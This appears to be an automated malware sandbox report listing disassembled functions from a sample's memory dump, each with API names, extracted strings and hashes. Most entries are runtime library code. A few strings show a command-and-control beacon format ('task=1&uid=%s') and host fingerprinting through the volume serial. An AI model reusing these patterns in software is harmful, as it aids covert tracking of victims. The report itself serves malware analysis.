                                                                                        • Opcode ID: 64d00ee2830e9379cd3ef173d90ae30a9ca42842e8ef135b9074179a121e00c4
                                                                                        • Instruction ID: d45ff3634429551e8e5baeafd3950e5de094835b52feff680c46649fddced410
                                                                                        • Opcode Fuzzy Hash: 64d00ee2830e9379cd3ef173d90ae30a9ca42842e8ef135b9074179a121e00c4
                                                                                        • Instruction Fuzzy Hash: 2F213A7661865182D630DB22F04036E77A1F794BA0F104232FE9E47795CF3DE485DB00
                                                                                        Function 00007FF60E61C920 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 53COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2191449237.00007FF60E611000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF60E610000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2191373286.00007FF60E610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191746519.00007FF60E646000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191854067.00007FF60E654000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191965609.00007FF60E65A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2192099654.00007FF60E661000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ff60e610000_8D8EBC2422383023011859.jbxd
                                                                                        Similarity
                                                                                        • API ID: LockitLockit::_std::_$Getfacet__int64_lockstd::locale::_
                                                                                        • String ID: bad cast
                                                                                        • API String ID: 1826629674-3145022300
                                                                                        • Opcode ID: 932e2d8308b347af2fb822a83c7166a45b16841b8f045a10c064c8219c059d73
                                                                                        • Instruction ID: 4d2612c110842527eefde511e6ab56bf0a9c83b444b5dffe7a12777bc0de786a
                                                                                        • Opcode Fuzzy Hash: 932e2d8308b347af2fb822a83c7166a45b16841b8f045a10c064c8219c059d73
                                                                                        • Instruction Fuzzy Hash: FE212F2262CE5680DA61DB14F49026EB360FBA47A4F641232FA9E837B9DF3CD544DB40
                                                                                        Function 00007FF60E61CA20 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 53COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2191449237.00007FF60E611000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF60E610000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2191373286.00007FF60E610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191746519.00007FF60E646000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191854067.00007FF60E654000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191965609.00007FF60E65A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2192099654.00007FF60E661000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ff60e610000_8D8EBC2422383023011859.jbxd
                                                                                        Similarity
                                                                                        • API ID: LockitLockit::_std::_$Getfacet__int64_lockstd::locale::_
                                                                                        • String ID: bad cast
                                                                                        • API String ID: 1826629674-3145022300
                                                                                        • Opcode ID: 6686d453f540abfc75b9a040e882549689efe832026ee8754cd51114fbe3f1ce
                                                                                        • Instruction ID: 2fbc54e954e6bb8a9e80f5e9d4fbb3e2ddad00fd309ed16ca9cf06374329bfc3
                                                                                        • Opcode Fuzzy Hash: 6686d453f540abfc75b9a040e882549689efe832026ee8754cd51114fbe3f1ce
                                                                                        • Instruction Fuzzy Hash: D2212F2262CE5681DA61DB14F49026EB360FBA47A4F644232FA9E837B9DF3CD544DB00
                                                                                        Function 00007FF60E6363C4 Relevance: 12.2, APIs: 8, Instructions: 168COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2191449237.00007FF60E611000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF60E610000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2191373286.00007FF60E610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191746519.00007FF60E646000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191854067.00007FF60E654000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191965609.00007FF60E65A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2192099654.00007FF60E661000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ff60e610000_8D8EBC2422383023011859.jbxd
                                                                                        Similarity
                                                                                        • API ID: free$Sleep_malloc_crtmalloc
                                                                                        • String ID:
                                                                                        • API String ID: 2523592665-0
                                                                                        • Opcode ID: 9dc3a43cf0aa1fcfdc29037b235636b50873e9ffe005ada4d84142dea13232af
                                                                                        • Instruction ID: e168ea4521cdde832168e67e8e27e92752f2ce32025426afd58dd2b808baeeb8
                                                                                        • Opcode Fuzzy Hash: 9dc3a43cf0aa1fcfdc29037b235636b50873e9ffe005ada4d84142dea13232af
                                                                                        • Instruction Fuzzy Hash: 5B61C332B18761A2EA10DF26F95026D73A0FB94764F244135FE4D87B52DF3CE466A340
                                                                                        Function 00007FF60E631D88 Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2191449237.00007FF60E611000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF60E610000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2191373286.00007FF60E610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191746519.00007FF60E646000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191854067.00007FF60E654000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191965609.00007FF60E65A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2192099654.00007FF60E661000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ff60e610000_8D8EBC2422383023011859.jbxd
                                                                                        Similarity
                                                                                        • API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
                                                                                        • String ID:
                                                                                        • API String ID: 781512312-0
                                                                                        • Opcode ID: 64063577f5759fc087550664f9166848bfe9c81f154bd90bd0409ab7649f8bd4
                                                                                        • Instruction ID: 2c0c76f4f1d6834fd0d6c8af5d3b591a195f7c51fb645cf5b35e0f44feeae16c
                                                                                        • Opcode Fuzzy Hash: 64063577f5759fc087550664f9166848bfe9c81f154bd90bd0409ab7649f8bd4
                                                                                        • Instruction Fuzzy Hash: C821EA52F2D3A242FB615731B44037952A0AFA6790F744231F5AD877D6CE5DD541A700
                                                                                        Function 00007FF60E62CD90 Relevance: 12.1, APIs: 8, Instructions: 60COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2191449237.00007FF60E611000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF60E610000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2191373286.00007FF60E610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191746519.00007FF60E646000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191854067.00007FF60E654000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191965609.00007FF60E65A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2192099654.00007FF60E661000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ff60e610000_8D8EBC2422383023011859.jbxd
                                                                                        Similarity
                                                                                        • API ID: _errno$AllocHeapNameUser_callnewhfreemalloc
                                                                                        • String ID:
                                                                                        • API String ID: 982591855-0
                                                                                        • Opcode ID: cadc991865815251f5f87effce6c4517c62175ad35677cb75216a9f745d246b1
                                                                                        • Instruction ID: 8925d866404c97656941f7f852581bd60267267972ea3392939c20c9e15ec48b
                                                                                        • Opcode Fuzzy Hash: cadc991865815251f5f87effce6c4517c62175ad35677cb75216a9f745d246b1
                                                                                        • Instruction Fuzzy Hash: C821B936718A55C6EB109F25E45032EB3A0F7E9B84F608435FA8D87766DF7DD844AB00
                                                                                        Function 00007FF60E62FEC8 Relevance: 12.0, APIs: 8, Instructions: 31synchronizationCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2191449237.00007FF60E611000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF60E610000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2191373286.00007FF60E610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191746519.00007FF60E646000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191854067.00007FF60E654000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191965609.00007FF60E65A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2192099654.00007FF60E661000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ff60e610000_8D8EBC2422383023011859.jbxd
                                                                                        Similarity
                                                                                        • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                        • String ID:
                                                                                        • API String ID: 299056699-0
                                                                                        • Opcode ID: fded58dde77be56de6fab05177e5339cc4062db6b0d45a6a30c187912645d6f3
                                                                                        • Instruction ID: 84afee2b7452099987fa2103009c23ff9db4d4acbd16796bb41dee00da12e73c
                                                                                        • Opcode Fuzzy Hash: fded58dde77be56de6fab05177e5339cc4062db6b0d45a6a30c187912645d6f3
                                                                                        • Instruction Fuzzy Hash: 4501DE23B2CA5282E7209B11F85422D6370FBF8B45FA01136F98EC2665CF3CDD45D650
                                                                                        Function 00007FF60E625414 Relevance: 10.7, APIs: 7, Instructions: 247COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2191449237.00007FF60E611000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF60E610000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2191373286.00007FF60E610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191746519.00007FF60E646000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191854067.00007FF60E654000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191965609.00007FF60E65A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2192099654.00007FF60E661000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ff60e610000_8D8EBC2422383023011859.jbxd
                                                                                        Similarity
                                                                                        • API ID: Ucopy$Decorator::getMtx_guardMtx_guard::~_TableTypetype_info::_name_internal_method
                                                                                        • String ID:
                                                                                        • API String ID: 4074051914-0
                                                                                        • Opcode ID: f014fbc6859682eefceef7ecbbf1b7741ac91cddb56665be6d968ce3dc7cad67
                                                                                        • Instruction ID: f281da6ebbd210d96c24bbb24589d0947070deddba1f62d9b13901bddf64a0cc
                                                                                        • Opcode Fuzzy Hash: f014fbc6859682eefceef7ecbbf1b7741ac91cddb56665be6d968ce3dc7cad67
                                                                                        • Instruction Fuzzy Hash: DFD1A426619BC985CA70DB5AE4903AAB761F7D9BC0F504026EECE83B69DF3CD444CB01
                                                                                        Function 00007FF60E618C60 Relevance: 10.6, APIs: 7, Instructions: 141COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2191449237.00007FF60E611000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF60E610000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2191373286.00007FF60E610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191746519.00007FF60E646000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191854067.00007FF60E654000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191965609.00007FF60E65A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2192099654.00007FF60E661000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ff60e610000_8D8EBC2422383023011859.jbxd
                                                                                        Similarity
                                                                                        • API ID: Ucopy$Mtx_guardMtx_guard::~__aligned_msizetype_info::_name_internal_method
                                                                                        • String ID:
                                                                                        • API String ID: 1928733530-0
                                                                                        • Opcode ID: 4325eb878f5f8b404332b1c80043bf9b581a45e85f0c9479c12b2f4d25b8355e
                                                                                        • Instruction ID: c8ccbee5f96ef9c760f43ee6dca8c921b148bd6fcf7521556392a6ac0271c669
                                                                                        • Opcode Fuzzy Hash: 4325eb878f5f8b404332b1c80043bf9b581a45e85f0c9479c12b2f4d25b8355e
                                                                                        • Instruction Fuzzy Hash: 69718D26A19F8582DA50DB5AF49026EA7A0F7D8BD4F245126FF8D83B69CE3CD441DF00
                                                                                        Function 00007FF60E618980 Relevance: 10.6, APIs: 7, Instructions: 141COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2191449237.00007FF60E611000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF60E610000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2191373286.00007FF60E610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191746519.00007FF60E646000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191854067.00007FF60E654000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191965609.00007FF60E65A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2192099654.00007FF60E661000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ff60e610000_8D8EBC2422383023011859.jbxd
                                                                                        Similarity
                                                                                        • API ID: Ucopy$Mtx_guardMtx_guard::~__aligned_msizetype_info::_name_internal_method
                                                                                        • String ID:
                                                                                        • API String ID: 1928733530-0
                                                                                        • Opcode ID: 09518546536a787895912284108b7650a63c47b0a4a23c6140e26a573662d104
                                                                                        • Instruction ID: fd623db9705c1b3c6c0c0ca58a1a93e4c7cc71d9cfc72a0480b7d87081a6a88f
                                                                                        • Opcode Fuzzy Hash: 09518546536a787895912284108b7650a63c47b0a4a23c6140e26a573662d104
                                                                                        • Instruction Fuzzy Hash: 4C71AC66A19F8482DA50DB5AF49026EA7A0F7D8BD4F205126FF8D83B69CE3CD441CF00
                                                                                        Function 00007FF60E63F30C Relevance: 10.6, APIs: 7, Instructions: 122COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2191449237.00007FF60E611000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF60E610000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2191373286.00007FF60E610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191746519.00007FF60E646000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191854067.00007FF60E654000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191965609.00007FF60E65A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2192099654.00007FF60E661000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ff60e610000_8D8EBC2422383023011859.jbxd
                                                                                        Similarity
                                                                                        • API ID: _errno_invalid_parameter_noinfo$_getptd_noexit
                                                                                        • String ID:
                                                                                        • API String ID: 1573762532-0
                                                                                        • Opcode ID: a13fad1822833028ca0eb10c8db0b597438e1cbbeed43b07fa581a08987f042d
                                                                                        • Instruction ID: ed38e619ec7c7a76c0e67f808c603189681174bde67ed93fad064cd2b5c31e41
                                                                                        • Opcode Fuzzy Hash: a13fad1822833028ca0eb10c8db0b597438e1cbbeed43b07fa581a08987f042d
                                                                                        • Instruction Fuzzy Hash: 7A41B462F282B681FE749B31B5405F9A2A0EF70794FA44132FA9D876C7DF2CE551A340
                                                                                        Function 00007FF60E633424 Relevance: 10.6, APIs: 7, Instructions: 107COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2191449237.00007FF60E611000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF60E610000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2191373286.00007FF60E610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191746519.00007FF60E646000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191854067.00007FF60E654000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191965609.00007FF60E65A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2192099654.00007FF60E661000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ff60e610000_8D8EBC2422383023011859.jbxd
                                                                                        Similarity
                                                                                        • API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
                                                                                        • String ID:
                                                                                        • API String ID: 781512312-0
                                                                                        • Opcode ID: 9ed3336eb9426492d7b9aa9cf18bd71b667003e75d89d3dfa61ab95dda06c464
                                                                                        • Instruction ID: 789e6c58f7365a5aeda6275f48a992634797ffa5dd543ae8ee3664eafb8381aa
                                                                                        • Opcode Fuzzy Hash: 9ed3336eb9426492d7b9aa9cf18bd71b667003e75d89d3dfa61ab95dda06c464
                                                                                        • Instruction Fuzzy Hash: 65411C62E382B281EB649B25B5401B972A0EF70BB1FA44135F6AD877C6DE1CE551E700
                                                                                        Function 00007FF60E630D0C Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 77COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2191449237.00007FF60E611000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF60E610000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2191373286.00007FF60E610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191746519.00007FF60E646000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191854067.00007FF60E654000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191965609.00007FF60E65A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2192099654.00007FF60E661000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ff60e610000_8D8EBC2422383023011859.jbxd
                                                                                        Similarity
                                                                                        • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                        • String ID: %08lX%04lX%lu$C$\
                                                                                        • API String ID: 3001812590-4231652159
                                                                                        • Opcode ID: 7bd2a999512e55fdd9f8ee897116d2d3bdff1adfd49b806867a6735701cc4331
                                                                                        • Instruction ID: 70e70a5a6660811721e16674a95a6aec1dfd8fe913e1154774995edab2bbd7bb
                                                                                        • Opcode Fuzzy Hash: 7bd2a999512e55fdd9f8ee897116d2d3bdff1adfd49b806867a6735701cc4331
                                                                                        • Instruction Fuzzy Hash: 87310B3261C68186E7118B68F4543AABBA0E7D5744F640136F68D87BA9DFBED948CB00
                                                                                        Function 00007FF60E637A68 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 22COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2191449237.00007FF60E611000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF60E610000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2191373286.00007FF60E610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191746519.00007FF60E646000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191854067.00007FF60E654000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191965609.00007FF60E65A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2192099654.00007FF60E661000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ff60e610000_8D8EBC2422383023011859.jbxd
                                                                                        Similarity
                                                                                        • API ID: _getptd
                                                                                        • String ID: MOC$RCC$csm
                                                                                        • API String ID: 3186804695-2671469338
                                                                                        • Opcode ID: 8894c65672d227fda39ec56e5dcad6079c82dd72da27f0faa52aa83d8d89759d
                                                                                        • Instruction ID: b4d50e9f87d7058678d4330fe2d7588166eb396078913b05f8a2d664fe691557
                                                                                        • Opcode Fuzzy Hash: 8894c65672d227fda39ec56e5dcad6079c82dd72da27f0faa52aa83d8d89759d
                                                                                        • Instruction Fuzzy Hash: 10F0A735D2C112D5E2542B70A0013BD25A0FFB4705F759472F20883381CF7C7590A702
                                                                                        Function 00007FF60E62C9D0 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 102sleepCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2191449237.00007FF60E611000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF60E610000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2191373286.00007FF60E610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191746519.00007FF60E646000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191854067.00007FF60E654000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191965609.00007FF60E65A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2192099654.00007FF60E661000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ff60e610000_8D8EBC2422383023011859.jbxd
                                                                                        Similarity
                                                                                        • API ID: Sleep$DirectoryInformationVolumeWindows_errno_invalid_parameter_noinfo_snprintfwsprintf
                                                                                        • String ID: data=$err$task=1&uid=%s
                                                                                        • API String ID: 1865811002-1781340663
                                                                                        • Opcode ID: 0af1d471e20986adbd40fd4a058f03d5b486d937defcffe757d3d044ca000848
                                                                                        • Instruction ID: d7b12d0cabee1fbb7c9f4f0a6149ac6089980c1e58cc1bcbfc8bfbdb561f8688
                                                                                        • Opcode Fuzzy Hash: 0af1d471e20986adbd40fd4a058f03d5b486d937defcffe757d3d044ca000848
                                                                                        • Instruction Fuzzy Hash: 3941802262C99186E760DB14F4503AEA7A1F7E8794F604235F68DC3B99DF3CD949DB00
                                                                                        Function 00007FF60E6303F4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2191449237.00007FF60E611000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF60E610000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2191373286.00007FF60E610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191746519.00007FF60E646000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191854067.00007FF60E654000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191965609.00007FF60E65A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2192099654.00007FF60E661000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ff60e610000_8D8EBC2422383023011859.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileName$FindModulePathwcslenwcsncpy
                                                                                        • String ID: Unknown
                                                                                        • API String ID: 4220601557-1654365787
                                                                                        • Opcode ID: 1dfae691d3f300e8eb9ec59fb40c600c63e8ff47fd4a1043f669c2907b9887a7
                                                                                        • Instruction ID: 994f37263b6c58c1db3c566c8bf1f8884bd1b4780549f97c065eb029623027c8
                                                                                        • Opcode Fuzzy Hash: 1dfae691d3f300e8eb9ec59fb40c600c63e8ff47fd4a1043f669c2907b9887a7
                                                                                        • Instruction Fuzzy Hash: 4B21E97262CA9486D7B0DB15F48476AA3A0F798B44F500225FACDC3B68DF3DD654DB00
                                                                                        Function 00007FF60E6302E0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2191449237.00007FF60E611000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF60E610000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2191373286.00007FF60E610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191746519.00007FF60E646000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191854067.00007FF60E654000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191965609.00007FF60E65A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2192099654.00007FF60E661000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ff60e610000_8D8EBC2422383023011859.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseOpenValue
                                                                                        • String ID: Hidden$Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
                                                                                        • API String ID: 779948276-85274793
                                                                                        • Opcode ID: beb93c632a34156963fe64735a9b928f099ba9484622690a6d160c2725b03238
                                                                                        • Instruction ID: 9606b62eadbf61c6443bb799ff477a9caed4f2ed92e05a895bb0602a262b4e52
                                                                                        • Opcode Fuzzy Hash: beb93c632a34156963fe64735a9b928f099ba9484622690a6d160c2725b03238
                                                                                        • Instruction Fuzzy Hash: D6010C76629B91CAD7909B14F48475AB7A4F798B94F902225FB8E83B68DF3CC144CF00
                                                                                        Function 00007FF60E6113A0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 28libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2191449237.00007FF60E611000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF60E610000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2191373286.00007FF60E610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191746519.00007FF60E646000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191854067.00007FF60E654000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191965609.00007FF60E65A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2192099654.00007FF60E661000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ff60e610000_8D8EBC2422383023011859.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressHandleModuleProc
                                                                                        • String ID: @$IsWow64Process$kernel32
                                                                                        • API String ID: 1646373207-1447682865
                                                                                        • Opcode ID: ab93a9697e7db49f45cab12df12d8e20f72fdeb3fe900da885d9202ed212137f
